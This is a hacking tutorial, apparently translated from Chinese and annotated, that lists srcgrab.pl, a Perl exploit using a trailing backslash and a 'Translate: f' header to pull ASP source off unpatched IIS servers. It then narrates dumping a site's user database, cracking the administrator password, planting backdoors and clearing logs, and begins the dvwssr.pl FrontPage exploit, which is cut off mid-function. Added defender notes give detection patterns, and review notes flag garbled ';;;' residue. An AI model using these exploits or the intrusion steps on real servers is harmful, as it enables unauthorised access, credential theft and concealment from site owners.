# srcgrab.pl (name as given in its own usage text): issues one HTTP GET for the
# URL in $ARGV[0] and prints the response body, or an HTML error page on failure.
# The request differs from an ordinary browser request in two visible ways: a
# backslash is appended to the URL and a "Translate: f" header is set. The
# narrative around this listing describes an unpatched server returning script
# source to it.
# Defender notes: where request headers are captured (proxy, WAF, IDS), a
# "Translate: f" header on a request for a server-side script whose path ends
# in "\" is the pattern to alert on. WebDAV authoring clients also send this
# header, so scope the rule to script extensions. Remediation is the vendor
# patch, plus keeping credentials and connection strings out of script source.
# NOTE(review): the ";;;" runs and the mis-encoded bytes after "it" in the
# usage text look like page-extraction residue, not part of the original
# script -- confirm against an archived copy before relying on this listing.

# No (or false) first argument: print the usage text and stop.
if (not $ARGV[0]) {;;;
print qq~
Geee it磗;;; running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;};;;
# The URL is taken verbatim from the command line; nothing validates it.
# $victimurl and $ua below are package globals (no `my`, no `use strict`).
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request. '\\' inside single quotes is one literal backslash, so the
# URL actually requested is the argument with "\" appended.
my $req = new HTTP::Request GET => $victimurl . '\\'; # trailing backslash appended to the URL
# content_type is set twice; the second call overwrites the first, so the
# request goes out with Content-Type: text/html.
$req->content_type('application/x-www-FORM-urlencoded');
$req->content_type('text/html');
# "Translate: f" is the second half of the request signature described above.
$req->header(Translate => 'f'); # the Translate header the request depends on
# A form-style body is attached even though the method is GET.
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
# Check the outcome of the response: on success the body goes to stdout
# unmodified (the usage text suggests redirecting it to a file); otherwise the
# error is printed as HTML.
if ($res->is_success) {;;;
print $res->content;
};;; else {;;;
print $res->error_as_HTML;
};;;
---------代码结束-------------
打上perl -x srcgrab.pl http://chat.com/login.asp > chat.txt
(导出代码为chat.txt),看来我还有点运气,白痴网管没打补丁,嘿嘿。
看看代码,把数据库搞下来了,搞到这些用户名和密码后,挂好这些用户名和密码慢慢破啦,我们先喝杯茶歇会。
几分钟后,嘿嘿,Administrator的密码居然被搞出来了啊!@dm1n,网管对密码还挺精明的,不过补丁就不是了啊。登陆后搞好后门和清LOG先。
OK了,现在来搞定那个ABC吧,上面的老步骤啦,
。。。。。。。。。。。。。
靠,居然ERROR了,这个网管没那么傻啊,哎看来得再找办法了。
用用最近刚搞到的代码吧,这个漏洞是利用微软留下的后门搞到文件的源代码。Netscape engineers are weenies!就是那个后门的密码。
------------代码开始----------------
#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
use Socket;
# Top-level driver: reads two command-line arguments, encodes the second with
# encodefilename(), and sends one HTTP/1.0 GET for
# /_vti_bin/_vti_aut/dvwssr.dll with the encoded value as the query string,
# printing whatever sendraw() returns.
# Defender notes: any request for /_vti_bin/_vti_aut/dvwssr.dll carrying a
# query string is worth reviewing in web-server logs. The remediation commonly
# reported for this issue was removing the DLL or applying the vendor update --
# verify against the vendor advisory for the affected product.
# $ip, $file and $url are package globals (no `my`, no `use strict`).
# NOTE(review): $ip is not used in the visible lines; presumably sendraw()
# reads it as a global -- confirm against the rest of the file.
$ip=$ARGV[0];
# Neither argument is checked; a missing one leaves the variable undef.
$file=$ARGV[1];
# encodefilename() is called twice with the same input: once here for display,
# once below to build the request.
print "Encoding to: ".encodefilename($file)."\n";
# The request ends in "\n\n" (bare LF line endings, not CRLF) and carries no
# Host header, consistent with HTTP/1.0.
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
# sendraw() is defined outside the visible lines; its return value is printed as-is.
print sendraw($url);
sub encodefilename {;;
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";